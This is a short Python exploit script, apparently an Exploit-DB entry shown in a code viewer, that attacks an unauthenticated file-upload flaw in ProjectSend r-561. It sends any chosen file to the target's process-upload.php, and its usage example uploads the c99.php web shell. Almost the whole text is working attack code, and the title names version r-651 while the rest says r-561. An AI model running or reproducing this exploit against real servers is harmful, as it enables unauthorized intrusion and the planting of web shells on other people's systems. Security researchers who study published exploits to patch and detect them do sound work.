24 lines
No EOL
773 B
Python
Executable file
24 lines
No EOL
773 B
Python
Executable file
#!/usr/bin/python
|
|
|
|
# Exploit Title: ProjectSend r-651 File Upload
|
|
# Date: December 01, 2014
|
|
# Exploit Author: Fady Mohamed Osman (Exploit-db id:2986)
|
|
# Vendor Homepage: http://www.projectsend.org/
|
|
# Software Link: http://www.projectsend.org/download/67/
|
|
# Version: r-561
|
|
# Tested on: Kubuntu 14.10 x64
|
|
|
|
|
|
import sys
|
|
import requests
|
|
scriptName = sys.argv[0]
|
|
if (len(sys.argv) != 3):
|
|
print "Please enter the target path and the file to upload."
|
|
print "Example : " + scriptName + " http://10.0.0.2/ProjectSend-r561 c99.php"
|
|
quit()
|
|
print "Exploiting ProjectSend-r561 File Upload .."
|
|
url = sys.argv[1] + "/" + 'process-upload.php' + '?name=' + sys.argv[2]
|
|
print "Sending Url " + url
|
|
files = {'file': open(sys.argv[2], 'rb')}
|
|
r = requests.post(url, files=files)
|
|
print r.text |